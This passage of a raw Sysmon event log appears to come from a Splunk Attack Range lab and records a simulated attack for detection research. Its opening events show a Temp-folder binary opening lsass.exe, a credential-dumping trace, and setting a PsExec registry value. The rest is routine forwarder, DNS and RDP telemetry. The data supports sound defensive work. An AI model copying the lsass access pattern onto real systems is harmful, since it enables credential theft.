11:04:38.038{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-14C5-6216-AA06-000000003802}7072C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294965Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:38.038{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-14C5-6216-AA06-000000003802}7072C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000294964Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 11:04:38.004{C8EA50B7-14C5-6216-AA06-000000003802}7072C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 354300x8000000000000000219132Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:37.727{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx58955-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 354300x8000000000000000219131Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:36.624{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51503-false10.0.1.12-8000- 23542300x8000000000000000219130Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:39.378{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94FFC0B66B60997F22D8DC6A4796308A,SHA256=619639C37EA46BFFB4D901F4C6F0BE6F1DC75992109423F3574C23A5BC6B6E6C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294972Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:37.520{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local50751- 354300x8000000000000000294971Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:36.608{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49190-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000294970Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:39.304{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55B0C6D34B9103F838DFAA5B867751DE,SHA256=D3C69402AA68C07ECBB65A8B4ABB5E4734FB1D1A54274B99918D3AEEDF6D07E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219134Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:40.753{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7226F28AFB67B51E4BD46DF7F416CCF9,SHA256=E48FA708012ADB80FF58B7F621FD6176F5BF067C973659FFA77A3D9B7BF0447C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219133Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:40.597{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53D3A6A582C0D74FC9AEE2249165B695,SHA256=00FCC987C7EA1550FA1C77FE805CE872720B9D2252468096671BCEEA127F6266,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294974Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:40.319{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF0A3356D3B4547662BCA3B24378D9ED,SHA256=62600F4ECE415700EED0C9A94AFC3EC6D65F786D93958011F61110462EFE5296,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294973Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:40.157{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219135Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:41.832{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74D23F54C98E70554321B9F01EA4166C,SHA256=CC76CA2FA9CAE94FDCC46155271DDDA9F901670022377BCD4BE8C266BC310F58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294976Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:41.339{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87E0E6EDB10C15AFA3663A6E66515491,SHA256=AF65F8C5B8E6E1178FCDB040A418B8F41BCB70C6C75984A14DB764D8B7F08B53,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294975Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:38.649{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local50924- 23542300x8000000000000000219136Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:42.863{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE8E0F116A2E8ABB8EB5C64724675C75,SHA256=692C2EF9D02FA370CA62DADF662D2F6D1A9793C7A12DB111A29C509EDA45B121,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294978Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:42.346{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F383C78DAD961FF0C9905E7242ADC705,SHA256=2EF66A325503510FE14BE6D16B6EC838651B7416AC2B91801D8CDAA20F06CF77,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294977Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:39.609{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49193-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000219139Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:43.878{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06E86272B168531EE4CB8C5AAFFA502C,SHA256=DB29BAA3F49068D28D18D43740CEF6FF833026B71B823C2448788D8E2500E80C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294979Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:43.361{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D0598E105F400D9854F949E5142EBB4,SHA256=28655E2648A3EF4070BE4172CB1A826D65665684EB392DBFE3BB0EC55F763BE2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219138Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:41.639{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51504-false10.0.1.12-8000- 354300x8000000000000000219137Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:41.593{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx54187-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219154Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:44.879{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72608D5B89A79E51EBCC68F46115D312,SHA256=CAAECDA43B74C3DC373FBC67EADAE24179ED4B028B7CEAF8710B5124D4F547B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294980Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:44.361{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DB3850D9B88C2F7249EF3269D382488,SHA256=C13BAE48535512DC76DBFD3A78E3C241E601644CC9A9EC925D5A2AF2F2FC3BE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219153Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:44.706{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=40BD0A446B7AD106468F393D004388A0,SHA256=A2AC1787A4B32FBD769F387E0E5191F6F6EF3C78F1AF7596DB2E4C399EF207B4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000219152Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:44.660{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-14CC-6216-BB04-000000003902}1516C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219151Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:44.660{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219150Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:44.660{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219149Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:44.660{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219148Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:44.660{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219147Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:44.660{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219146Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:44.660{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219145Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:44.660{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219144Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:44.660{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219143Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:44.660{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219142Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:44.660{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-14CC-6216-BB04-000000003902}1516C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000219141Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:44.660{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-14CC-6216-BB04-000000003902}1516C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219140Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:44.661{4F8D34B0-14CC-6216-BB04-000000003902}1516C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program 